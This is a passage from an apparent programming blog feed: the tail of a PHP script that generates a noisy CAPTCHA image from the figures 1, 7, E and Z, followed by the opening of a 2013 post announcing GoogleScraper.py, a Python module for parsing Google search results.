<span class="nv">$h</span> <span class="o">=</span> <span class="nb">fopen</span><span class="p">(</span><span class="nx">PPM_FILE</span><span class="p">,</span> <span class="s2">"w"</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="nv">$h</span><span class="p">)</span> <span class="p">{</span>
<span class="k">echo</span> <span class="s2">"fopen() error"</span><span class="p">;</span>
<span class="nb">var_dump</span><span class="p">(</span><span class="nb">error_get_last</span><span class="p">());</span>
<span class="k">exit</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span>
<span class="p">}</span>
<span class="nv">$figures</span> <span class="o">=</span> <span class="k">array</span><span class="p">();</span>
<span class="nv">$str</span> <span class="o">=</span> <span class="k">array</span><span class="p">();</span>
<span class="k">for</span> <span class="p">(</span><span class="nv">$index</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="nv">$index</span> <span class="o"><</span> <span class="mi">7</span><span class="p">;</span> <span class="nv">$index</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
<span class="nv">$choose</span> <span class="o">=</span> <span class="nb">rand</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span><span class="mi">3</span><span class="p">);</span>
<span class="k">switch</span> <span class="p">(</span><span class="nv">$choose</span><span class="p">)</span> <span class="p">{</span>
<span class="k">case</span> <span class="mi">0</span><span class="o">:</span>
<span class="nv">$figures</span><span class="p">[</span><span class="nv">$index</span><span class="p">]</span> <span class="o">=</span> <span class="nx">get_1</span><span class="p">();</span> <span class="nv">$str</span><span class="p">[</span><span class="nv">$index</span><span class="p">]</span> <span class="o">=</span> <span class="s1">'1'</span><span class="p">;</span>
<span class="k">break</span><span class="p">;</span>
<span class="k">case</span> <span class="mi">1</span><span class="o">:</span>
<span class="nv">$figures</span><span class="p">[</span><span class="nv">$index</span><span class="p">]</span> <span class="o">=</span> <span class="nx">get_7</span><span class="p">();</span> <span class="nv">$str</span><span class="p">[</span><span class="nv">$index</span><span class="p">]</span> <span class="o">=</span> <span class="s1">'7'</span><span class="p">;</span>
<span class="k">break</span><span class="p">;</span>
<span class="k">case</span> <span class="mi">2</span><span class="o">:</span>
<span class="nv">$figures</span><span class="p">[</span><span class="nv">$index</span><span class="p">]</span> <span class="o">=</span> <span class="nx">get_E</span><span class="p">();</span> <span class="nv">$str</span><span class="p">[</span><span class="nv">$index</span><span class="p">]</span> <span class="o">=</span> <span class="s1">'E'</span><span class="p">;</span>
<span class="k">break</span><span class="p">;</span>
<span class="k">case</span> <span class="mi">3</span><span class="o">:</span>
<span class="nv">$figures</span><span class="p">[</span><span class="nv">$index</span><span class="p">]</span> <span class="o">=</span> <span class="nx">get_Z</span><span class="p">();</span> <span class="nv">$str</span><span class="p">[</span><span class="nv">$index</span><span class="p">]</span> <span class="o">=</span> <span class="s1">'Z'</span><span class="p">;</span>
<span class="k">break</span><span class="p">;</span>
<span class="k">default</span><span class="o">:</span>
<span class="k">break</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="nv">$captcha</span> <span class="o">=</span> <span class="nx">glue_figures</span><span class="p">(</span><span class="nv">$figures</span><span class="p">);</span>
<span class="nv">$width</span> <span class="o">=</span> <span class="nx">FIGURE_SIZE</span> <span class="o">*</span> <span class="nb">count</span><span class="p">(</span><span class="nv">$figures</span><span class="p">);</span>
<span class="nv">$height</span> <span class="o">=</span> <span class="nb">count</span><span class="p">(</span><span class="nv">$captcha</span><span class="p">);</span>
<span class="cm">/* write the ppm header */</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="nb">fwrite</span><span class="p">(</span><span class="nv">$h</span><span class="p">,</span> <span class="s2">"P3</span><span class="se">\n</span><span class="si">$width</span><span class="s2"> </span><span class="si">$height\n255\n</span><span class="s2">"</span><span class="p">))</span> <span class="p">{</span>
<span class="k">echo</span> <span class="s1">'fwrite(header) failed'</span><span class="p">;</span>
<span class="k">exit</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">for</span> <span class="p">(</span><span class="nv">$i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="nv">$i</span> <span class="o"><</span> <span class="nv">$height</span><span class="p">;</span> <span class="nv">$i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
<span class="k">for</span> <span class="p">(</span><span class="nv">$j</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="nv">$j</span> <span class="o"><</span> <span class="nv">$width</span><span class="p">;</span> <span class="nv">$j</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
<span class="nb">fwrite</span><span class="p">(</span><span class="nv">$h</span><span class="p">,</span> <span class="nv">$captcha</span><span class="p">[</span><span class="nv">$i</span><span class="p">][</span><span class="nv">$j</span><span class="p">]</span><span class="o">.</span><span class="s2">"</span><span class="se">\t</span><span class="s2">"</span><span class="p">);</span>
<span class="p">}</span>
<span class="nb">fwrite</span><span class="p">(</span><span class="nv">$h</span><span class="p">,</span> <span class="s2">"</span><span class="se">\n</span><span class="s2">"</span><span class="p">);</span>
<span class="p">}</span>
<span class="nb">fclose</span><span class="p">(</span><span class="nv">$h</span><span class="p">);</span>
<span class="cm">/* Convert to png and remove ppm */</span>
<span class="nb">system</span><span class="p">(</span><span class="nb">sprintf</span><span class="p">(</span><span class="s2">"pnmtopng %s > %s && rm %s;"</span><span class="p">,</span>
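<span class="nb">escapeshellarg</span><span class="p">(</span><span class="nx">PPM_FILE</span><span class="p">),</span> <span class="nb">escapeshellarg</span><span class="p">(</span><span class="nx">CAPTCHA_PNG</span><span class="p">),</span> <span class="nb">escapeshellarg</span><span class="p">(</span><span class="nx">PPM_FILE</span><span class="p">)));</span>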
<span class="k">return</span> <span class="nv">$str</span><span class="p">;</span>
<span class="p">}</span>
<span class="cm">/*</span>
<span class="cm"> * Glue the figures together. Expects an array of figures. Returns</span>
<span class="cm"> * a single array representing the bitmap, ready to print...</span>
<span class="cm"> */</span>
<span class="k">function</span> <span class="nf">glue_figures</span><span class="p">(</span><span class="nv">$array_figures</span><span class="p">)</span> <span class="p">{</span>
<span class="nv">$captcha</span> <span class="o">=</span> <span class="k">array</span><span class="p">(</span><span class="k">array</span><span class="p">());</span>
<span class="nv">$off</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="nv">$pad_size</span> <span class="o">=</span> <span class="nb">rand</span><span class="p">(</span><span class="mi">8</span><span class="p">,</span><span class="mi">16</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="nv">$pad_size</span> <span class="o">%</span> <span class="mi">2</span> <span class="o">!=</span> <span class="mi">0</span><span class="p">)</span>
<span class="nv">$pad_size</span> <span class="o">-=</span> <span class="mi">1</span><span class="p">;</span> <span class="c1">// make even</span>
<span class="nv">$pad_size</span> <span class="o">/=</span> <span class="mi">2</span><span class="p">;</span>
<span class="nv">$shift</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="k">for</span> <span class="p">(</span><span class="nv">$index</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="nv">$index</span> <span class="o"><</span> <span class="nb">count</span><span class="p">(</span><span class="nv">$array_figures</span><span class="p">);</span> <span class="nv">$index</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
<span class="nv">$shift</span> <span class="o">=</span> <span class="nb">rand</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="nv">$pad_size</span><span class="p">);</span>
<span class="k">for</span> <span class="p">(</span><span class="nv">$i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="nv">$i</span> <span class="o"><</span> <span class="nx">FIGURE_SIZE</span><span class="o">+</span><span class="nv">$pad_size</span><span class="o">*</span><span class="mi">2</span><span class="p">;</span> <span class="nv">$i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
<span class="k">for</span> <span class="p">(</span><span class="nv">$j</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="nv">$j</span> <span class="o"><</span> <span class="nx">FIGURE_SIZE</span><span class="p">;</span> <span class="nv">$j</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
<span class="nv">$off</span> <span class="o">=</span> <span class="nx">FIGURE_SIZE</span> <span class="o">*</span> <span class="nv">$index</span> <span class="o">+</span> <span class="nv">$j</span><span class="p">;</span>
<span class="nv">$captcha</span><span class="p">[</span><span class="nv">$i</span><span class="p">][</span><span class="nv">$off</span><span class="p">]</span> <span class="o">=</span> <span class="nx">rand_grey</span><span class="p">();</span>
<span class="k">if</span> <span class="p">(</span><span class="nv">$i</span> <span class="o">></span> <span class="nv">$pad_size</span> <span class="o">&&</span> <span class="nv">$i</span> <span class="o"><</span> <span class="nx">FIGURE_SIZE</span><span class="o">+</span><span class="nv">$pad_size</span><span class="p">)</span> <span class="p">{</span>
<span class="nv">$captcha</span><span class="p">[</span><span class="nv">$i</span><span class="o">-</span><span class="nv">$shift</span><span class="p">][</span><span class="nv">$off</span><span class="p">]</span> <span class="o">=</span> <span class="nv">$array_figures</span><span class="p">[</span><span class="nv">$index</span><span class="p">][</span><span class="nv">$i</span><span class="o">-</span><span class="nv">$pad_size</span><span class="p">][</span><span class="nv">$j</span><span class="p">];</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="k">return</span> <span class="nv">$captcha</span><span class="p">;</span>
<span class="p">}</span>
<span class="cm">/* Get a random grey scale color to make some noise :) */</span>
<span class="k">function</span> <span class="nf">rand_grey</span><span class="p">()</span> <span class="p">{</span>
<span class="nv">$grey</span> <span class="o">=</span> <span class="nb">rand</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="mi">180</span><span class="p">);</span>
<span class="k">return</span> <span class="nb">sprintf</span><span class="p">(</span><span class="s2">"%s %s %s"</span><span class="p">,</span> <span class="nv">$grey</span><span class="p">,</span> <span class="nv">$grey</span><span class="p">,</span> <span class="nv">$grey</span><span class="p">);</span>
<span class="p">}</span>
<span class="cm">/* Get a random color */</span>
<span class="k">function</span> <span class="nf">rand_color</span><span class="p">()</span> <span class="p">{</span>
<span class="k">return</span> <span class="nb">sprintf</span>
<span class="p">(</span>
<span class="s2">"%s %s %s"</span><span class="p">,</span>
<span class="nb">rand</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="mi">255</span><span class="p">),</span>
<span class="nb">rand</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="mi">255</span><span class="p">),</span>
<span class="nb">rand</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="mi">255</span><span class="p">)</span>
<span class="p">);</span>
<span class="p">}</span>
<span class="k">function</span> <span class="nf">get_1</span><span class="p">()</span> <span class="p">{</span>
<span class="nv">$one</span> <span class="o">=</span> <span class="k">array</span><span class="p">(</span><span class="k">array</span><span class="p">());</span>
<span class="c1">// Apply a random shift</span>
<span class="nv">$r_offset</span> <span class="o">=</span> <span class="nb">rand</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="nx">FIGURE_SIZE</span><span class="o">/</span><span class="mi">2</span><span class="p">);</span>
<span class="c1">// Number of rows drawn before the brush color changes</span>
<span class="nv">$n_color_changes</span> <span class="o">=</span> <span class="nx">FIGURE_SIZE</span> <span class="o">/</span>
<span class="p">(</span><span class="nb">rand</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="nx">NUM_BRUSH_CHANGES_MAX</span><span class="p">)</span> <span class="o">+</span> <span class="mi">1</span><span class="p">);</span>
<span class="c1">// Get a random brush</span>
<span class="nv">$brush</span> <span class="o">=</span> <span class="nx">rand_color</span><span class="p">();</span>
<span class="k">for</span> <span class="p">(</span><span class="nv">$i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="nv">$i</span> <span class="o"><</span> <span class="nx">FIGURE_SIZE</span><span class="p">;</span> <span class="nv">$i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="nv">$i</span> <span class="o">%</span> <span class="nv">$n_color_changes</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span>
<span class="nv">$brush</span> <span class="o">=</span> <span class="nx">rand_color</span><span class="p">();</span>
<span class="k">for</span> <span class="p">(</span><span class="nv">$j</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="nv">$j</span> <span class="o"><</span> <span class="nx">FIGURE_SIZE</span><span class="p">;</span> <span class="nv">$j</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
<span class="c1">// Fill the rest with greyscale colors</span>
<span class="nv">$one</span><span class="p">[</span><span class="nv">$i</span><span class="p">][</span><span class="nv">$j</span><span class="p">]</span> <span class="o">=</span> <span class="nx">rand_grey</span><span class="p">();</span>
<span class="c1">// The vertical stem of the '1'</span>
<span class="k">if</span> <span class="p">(</span><span class="nv">$j</span> <span class="o">==</span> <span class="nx">FIGURE_SIZE</span><span class="o">-</span><span class="mi">1</span><span class="o">-</span><span class="nv">$r_offset</span> <span class="o">||</span>
<span class="nv">$j</span> <span class="o">==</span> <span class="nx">FIGURE_SIZE</span><span class="o">-</span><span class="mi">2</span><span class="o">-</span><span class="nv">$r_offset</span><span class="p">)</span> <span class="p">{</span>
<span class="nv">$one</span><span class="p">[</span><span class="nv">$i</span><span class="p">][</span><span class="nv">$j</span><span class="p">]</span> <span class="o">=</span> <span class="nv">$brush</span><span class="p">;</span>
<span class="p">}</span>
<span class="c1">// The hook of the '1'</span>
<span class="k">if</span> <span class="p">((</span><span class="nv">$i</span> <span class="o">+</span> <span class="nv">$j</span> <span class="o">==</span> <span class="nx">FIGURE_SIZE</span><span class="o">-</span><span class="mi">1</span><span class="o">-</span><span class="nv">$r_offset</span> <span class="o">&&</span> <span class="nv">$i</span> <span class="o"><</span> <span class="p">(</span><span class="nx">FIGURE_SIZE</span><span class="o">-</span><span class="mi">1</span><span class="p">)</span><span class="o">/</span><span class="mi">2</span><span class="p">)</span> <span class="o">||</span>
<span class="p">(</span><span class="nv">$i</span><span class="o">+</span><span class="mi">1</span> <span class="o">+</span> <span class="nv">$j</span> <span class="o">==</span> <span class="nx">FIGURE_SIZE</span><span class="o">-</span><span class="mi">1</span><span class="o">-</span><span class="nv">$r_offset</span> <span class="o">&&</span> <span class="nv">$i</span> <span class="o"><</span> <span class="p">(</span><span class="nx">FIGURE_SIZE</span><span class="o">-</span><span class="mi">1</span><span class="p">)</span><span class="o">/</span><span class="mi">2</span><span class="p">))</span>
<span class="nv">$one</span><span class="p">[</span><span class="nv">$i</span><span class="p">][</span><span class="nv">$j</span><span class="p">]</span> <span class="o">=</span> <span class="nv">$brush</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="k">return</span> <span class="nv">$one</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">function</span> <span class="nf">get_7</span><span class="p">()</span> <span class="p">{</span>
<span class="nv">$seven</span> <span class="o">=</span> <span class="k">array</span><span class="p">(</span><span class="k">array</span><span class="p">());</span>
<span class="c1">// Apply a random shift</span>
<span class="nv">$r_offset</span> <span class="o">=</span> <span class="nb">rand</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="nx">FIGURE_SIZE</span><span class="o">/</span><span class="mi">2</span><span class="p">);</span>
<span class="c1">// Number of rows drawn before the brush color changes</span>
<span class="nv">$n_color_changes</span> <span class="o">=</span> <span class="nx">FIGURE_SIZE</span> <span class="o">/</span>
<span class="p">(</span><span class="nb">rand</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="nx">NUM_BRUSH_CHANGES_MAX</span><span class="p">)</span> <span class="o">+</span> <span class="mi">1</span><span class="p">);</span>
<span class="c1">// Get a random brush</span>
<span class="nv">$brush</span> <span class="o">=</span> <span class="nx">rand_color</span><span class="p">();</span>
<span class="k">for</span> <span class="p">(</span><span class="nv">$i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="nv">$i</span> <span class="o"><</span> <span class="nx">FIGURE_SIZE</span><span class="p">;</span> <span class="nv">$i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="nv">$i</span> <span class="o">%</span> <span class="nv">$n_color_changes</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span>
<span class="nv">$brush</span> <span class="o">=</span> <span class="nx">rand_color</span><span class="p">();</span>
<span class="k">for</span> <span class="p">(</span><span class="nv">$j</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="nv">$j</span> <span class="o"><</span> <span class="nx">FIGURE_SIZE</span><span class="p">;</span> <span class="nv">$j</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
<span class="c1">// Fill the rest with greyscale colors</span>
<span class="nv">$seven</span><span class="p">[</span><span class="nv">$i</span><span class="p">][</span><span class="nv">$j</span><span class="p">]</span> <span class="o">=</span> <span class="nx">rand_grey</span><span class="p">();</span>
<span class="c1">// The roof of the '7'</span>
<span class="k">if</span> <span class="p">((</span><span class="nv">$i</span> <span class="o">==</span> <span class="mi">0</span> <span class="o">||</span> <span class="nv">$i</span> <span class="o">==</span> <span class="mi">1</span><span class="p">)</span> <span class="o">&&</span>
<span class="nv">$j</span> <span class="o">></span> <span class="p">(</span><span class="nx">FIGURE_SIZE</span><span class="o">-</span><span class="mi">1</span><span class="p">)</span><span class="o">/</span><span class="mi">2</span><span class="p">)</span>
<span class="nv">$seven</span><span class="p">[</span><span class="nv">$i</span><span class="p">][</span><span class="nv">$j</span><span class="o">-</span><span class="nv">$r_offset</span><span class="p">]</span> <span class="o">=</span> <span class="nv">$brush</span><span class="p">;</span>
<span class="c1">// The diagonal stem of the '7'</span>
<span class="k">if</span> <span class="p">(</span> <span class="p">(</span><span class="nv">$i</span><span class="o">/</span><span class="mi">2</span> <span class="o">+</span> <span class="nv">$j</span><span class="p">)</span> <span class="o">==</span> <span class="nx">FIGURE_SIZE</span><span class="o">-</span><span class="mi">1</span><span class="o">-</span><span class="nv">$r_offset</span> <span class="o">||</span>
<span class="p">(</span><span class="nv">$i</span><span class="o">/</span><span class="mi">2</span> <span class="o">+</span> <span class="nv">$j</span><span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="o">==</span> <span class="nx">FIGURE_SIZE</span><span class="o">-</span><span class="mi">1</span><span class="o">-</span><span class="nv">$r_offset</span> <span class="o">||</span>
<span class="p">((</span><span class="nv">$i</span><span class="o">+</span><span class="mi">1</span><span class="p">)</span><span class="o">/</span><span class="mi">2</span> <span class="o">+</span> <span class="nv">$j</span><span class="p">)</span> <span class="o">==</span> <span class="nx">FIGURE_SIZE</span><span class="o">-</span><span class="mi">1</span><span class="o">-</span><span class="nv">$r_offset</span> <span class="o">||</span>
<span class="p">((</span><span class="nv">$i</span><span class="o">+</span><span class="mi">1</span><span class="p">)</span><span class="o">/</span><span class="mi">2</span> <span class="o">+</span> <span class="nv">$j</span><span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="o">==</span> <span class="nx">FIGURE_SIZE</span><span class="o">-</span><span class="mi">1</span><span class="o">-</span><span class="nv">$r_offset</span> <span class="p">)</span>
<span class="nv">$seven</span><span class="p">[</span><span class="nv">$i</span><span class="p">][</span><span class="nv">$j</span><span class="p">]</span> <span class="o">=</span> <span class="nv">$brush</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="k">return</span> <span class="nv">$seven</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">function</span> <span class="nf">get_Z</span><span class="p">()</span> <span class="p">{</span>
<span class="nv">$z</span> <span class="o">=</span> <span class="k">array</span><span class="p">(</span><span class="k">array</span><span class="p">());</span>
<span class="c1">// Apply a random shift</span>
<span class="nv">$r_offset</span> <span class="o">=</span> <span class="nb">rand</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="nx">FIGURE_SIZE</span><span class="o">/</span><span class="mi">2</span><span class="p">);</span>
<span class="c1">// Number of rows drawn before the brush color changes</span>
<span class="nv">$n_color_changes</span> <span class="o">=</span> <span class="nx">FIGURE_SIZE</span> <span class="o">/</span>
<span class="p">(</span><span class="nb">rand</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="nx">NUM_BRUSH_CHANGES_MAX</span><span class="p">)</span> <span class="o">+</span> <span class="mi">1</span><span class="p">);</span>
<span class="c1">// Get a random brush</span>
<span class="nv">$brush</span> <span class="o">=</span> <span class="nx">rand_color</span><span class="p">();</span>
<span class="k">for</span> <span class="p">(</span><span class="nv">$i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="nv">$i</span> <span class="o"><</span> <span class="nx">FIGURE_SIZE</span><span class="p">;</span> <span class="nv">$i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="nv">$i</span> <span class="o">%</span> <span class="nv">$n_color_changes</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span>
<span class="nv">$brush</span> <span class="o">=</span> <span class="nx">rand_color</span><span class="p">();</span>
<span class="k">for</span> <span class="p">(</span><span class="nv">$j</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="nv">$j</span> <span class="o"><</span> <span class="nx">FIGURE_SIZE</span><span class="p">;</span> <span class="nv">$j</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
<span class="c1">// Fill the rest with greyscale colors</span>
<span class="nv">$z</span><span class="p">[</span><span class="nv">$i</span><span class="p">][</span><span class="nv">$j</span><span class="p">]</span> <span class="o">=</span> <span class="nx">rand_grey</span><span class="p">();</span>
<span class="c1">// The top and bottom bars of the 'Z'</span>
<span class="k">if</span> <span class="p">(((</span><span class="nv">$i</span> <span class="o">==</span> <span class="mi">0</span> <span class="o">||</span> <span class="nv">$i</span> <span class="o">==</span> <span class="mi">1</span><span class="p">)</span> <span class="o">||</span>
<span class="p">(</span><span class="nv">$i</span> <span class="o">==</span> <span class="nx">FIGURE_SIZE</span><span class="o">-</span><span class="mi">1</span> <span class="o">||</span> <span class="nv">$i</span> <span class="o">==</span> <span class="nx">FIGURE_SIZE</span><span class="o">-</span><span class="mi">2</span><span class="p">))</span> <span class="o">&&</span>
<span class="nv">$j</span> <span class="o">></span> <span class="p">(</span><span class="nx">FIGURE_SIZE</span><span class="o">-</span><span class="mi">1</span><span class="p">)</span><span class="o">/</span><span class="mi">2</span><span class="p">)</span>
<span class="nv">$z</span><span class="p">[</span><span class="nv">$i</span><span class="p">][</span><span class="nv">$j</span><span class="o">-</span><span class="nv">$r_offset</span><span class="p">]</span> <span class="o">=</span> <span class="nv">$brush</span><span class="p">;</span>
<span class="c1">// The diagonal stroke of the 'Z'</span>
<span class="k">if</span> <span class="p">(</span> <span class="p">(</span><span class="nv">$i</span><span class="o">/</span><span class="mi">2</span> <span class="o">+</span> <span class="nv">$j</span><span class="p">)</span> <span class="o">==</span> <span class="nx">FIGURE_SIZE</span><span class="o">-</span><span class="mi">1</span><span class="o">-</span><span class="nv">$r_offset</span> <span class="o">||</span>
<span class="p">(</span><span class="nv">$i</span><span class="o">/</span><span class="mi">2</span> <span class="o">+</span> <span class="nv">$j</span><span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="o">==</span> <span class="nx">FIGURE_SIZE</span><span class="o">-</span><span class="mi">1</span><span class="o">-</span><span class="nv">$r_offset</span> <span class="o">||</span>
<span class="p">((</span><span class="nv">$i</span><span class="o">+</span><span class="mi">1</span><span class="p">)</span><span class="o">/</span><span class="mi">2</span> <span class="o">+</span> <span class="nv">$j</span><span class="p">)</span> <span class="o">==</span> <span class="nx">FIGURE_SIZE</span><span class="o">-</span><span class="mi">1</span><span class="o">-</span><span class="nv">$r_offset</span> <span class="o">||</span>
<span class="p">((</span><span class="nv">$i</span><span class="o">+</span><span class="mi">1</span><span class="p">)</span><span class="o">/</span><span class="mi">2</span> <span class="o">+</span> <span class="nv">$j</span><span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="o">==</span> <span class="nx">FIGURE_SIZE</span><span class="o">-</span><span class="mi">1</span><span class="o">-</span><span class="nv">$r_offset</span> <span class="p">)</span>
<span class="nv">$z</span><span class="p">[</span><span class="nv">$i</span><span class="p">][</span><span class="nv">$j</span><span class="p">]</span> <span class="o">=</span> <span class="nv">$brush</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="k">return</span> <span class="nv">$z</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">function</span> <span class="nf">get_E</span><span class="p">()</span> <span class="p">{</span>
<span class="nv">$e</span> <span class="o">=</span> <span class="k">array</span><span class="p">(</span><span class="k">array</span><span class="p">());</span>
<span class="c1">// Apply a random shift</span>
<span class="nv">$r_offset</span> <span class="o">=</span> <span class="nb">rand</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="nx">FIGURE_SIZE</span><span class="o">/</span><span class="mi">2</span><span class="p">);</span>
<span class="c1">// Number of rows drawn before the brush color changes</span>
<span class="nv">$n_color_changes</span> <span class="o">=</span> <span class="nx">FIGURE_SIZE</span> <span class="o">/</span>
<span class="p">(</span><span class="nb">rand</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="nx">NUM_BRUSH_CHANGES_MAX</span><span class="p">)</span> <span class="o">+</span> <span class="mi">1</span><span class="p">);</span>
<span class="c1">// Get a random brush</span>
<span class="nv">$brush</span> <span class="o">=</span> <span class="nx">rand_color</span><span class="p">();</span>
<span class="k">for</span> <span class="p">(</span><span class="nv">$i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="nv">$i</span> <span class="o"><</span> <span class="nx">FIGURE_SIZE</span><span class="p">;</span> <span class="nv">$i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="nv">$i</span> <span class="o">%</span> <span class="nv">$n_color_changes</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span>
<span class="nv">$brush</span> <span class="o">=</span> <span class="nx">rand_color</span><span class="p">();</span>
<span class="k">for</span> <span class="p">(</span><span class="nv">$j</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="nv">$j</span> <span class="o"><</span> <span class="nx">FIGURE_SIZE</span><span class="p">;</span> <span class="nv">$j</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
<span class="c1">// Fill the rest with greyscale colors</span>
<span class="nv">$e</span><span class="p">[</span><span class="nv">$i</span><span class="p">][</span><span class="nv">$j</span><span class="p">]</span> <span class="o">=</span> <span class="nx">rand_grey</span><span class="p">();</span>
<span class="c1">// The left vertical bar</span>
<span class="k">if</span> <span class="p">(</span><span class="nv">$j</span> <span class="o">==</span> <span class="nx">FIGURE_SIZE</span><span class="o">/</span><span class="mi">2</span><span class="o">-</span><span class="nv">$r_offset</span> <span class="o">||</span>
<span class="nv">$j</span> <span class="o">==</span> <span class="nx">FIGURE_SIZE</span><span class="o">/</span><span class="mi">2</span><span class="o">-</span><span class="mi">1</span><span class="o">-</span><span class="nv">$r_offset</span><span class="p">)</span>
<span class="nv">$e</span><span class="p">[</span><span class="nv">$i</span><span class="p">][</span><span class="nv">$j</span><span class="p">]</span> <span class="o">=</span> <span class="nv">$brush</span><span class="p">;</span>
<span class="c1">// The three horizontal bars of the 'E'</span>
<span class="k">if</span> <span class="p">(((</span><span class="nv">$i</span> <span class="o">==</span> <span class="mi">0</span> <span class="o">||</span> <span class="nv">$i</span> <span class="o">==</span> <span class="mi">1</span><span class="p">)</span> <span class="o">||</span>
<span class="p">(</span><span class="nv">$i</span> <span class="o">==</span> <span class="nx">FIGURE_SIZE</span><span class="o">-</span><span class="mi">1</span> <span class="o">||</span> <span class="nv">$i</span> <span class="o">==</span> <span class="nx">FIGURE_SIZE</span><span class="o">-</span><span class="mi">2</span><span class="p">)</span> <span class="o">||</span>
<span class="p">(</span><span class="nv">$i</span> <span class="o">==</span> <span class="nx">FIGURE_SIZE</span><span class="o">/</span><span class="mi">2</span><span class="o">-</span><span class="mi">1</span> <span class="o">||</span> <span class="nv">$i</span> <span class="o">==</span> <span class="nx">FIGURE_SIZE</span><span class="o">/</span><span class="mi">2</span><span class="o">-</span><span class="mi">2</span><span class="p">))</span>
<span class="cm">/* prevent out of bounds indices */</span>
<span class="o">&&</span> <span class="nv">$j</span> <span class="o">></span> <span class="p">(</span><span class="nx">FIGURE_SIZE</span><span class="o">-</span><span class="mi">1</span><span class="p">)</span><span class="o">/</span><span class="mi">2</span><span class="p">)</span>
<span class="nv">$e</span><span class="p">[</span><span class="nv">$i</span><span class="p">][</span><span class="nv">$j</span><span class="o">-</span><span class="nv">$r_offset</span><span class="p">]</span> <span class="o">=</span> <span class="nv">$brush</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="k">return</span> <span class="nv">$e</span><span class="p">;</span>
<span class="p">}</span>
<span class="cp">?></span><span class="x"></span>
</code></pre></div>GoogleScraper.py - A simple python module to parse google search results.2013-01-06T21:27:00+01:002013-01-06T21:27:00+01:00Nikolai Tschachertag:incolumitas.com,2013-01-06:/2013/01/06/googlesearch-a-rapid-python-class-to-get-search-results/<p><strong>UPDATE on 18th February 2014:</strong></p>
<p>This python module has now <a href="https://github.com/NikolaiT/GoogleScraper" title="github repo for GoogleScraper">its own github
repository</a>!</p>
<p>The plugin can extract</p>
<ul>
<li>All links</li>
<li>Link titles</li>
<li>The description/caption below the links</li>
</ul>
<p>and has the following features:</p>
<ul>
<li>Advanced proxy support for SOCKS4/4a/5 and HTTP PROXY</li>
<li>Multithreading</li>
<li>XPATH parsing</li>
<li>Supports almost <a href="http://www.google.com/support/enterprise/static/gsa/docs/admin/70/gsa_doc_set/xml_reference/" title="search protocol reference">all search
parameters</a></li>
</ul>
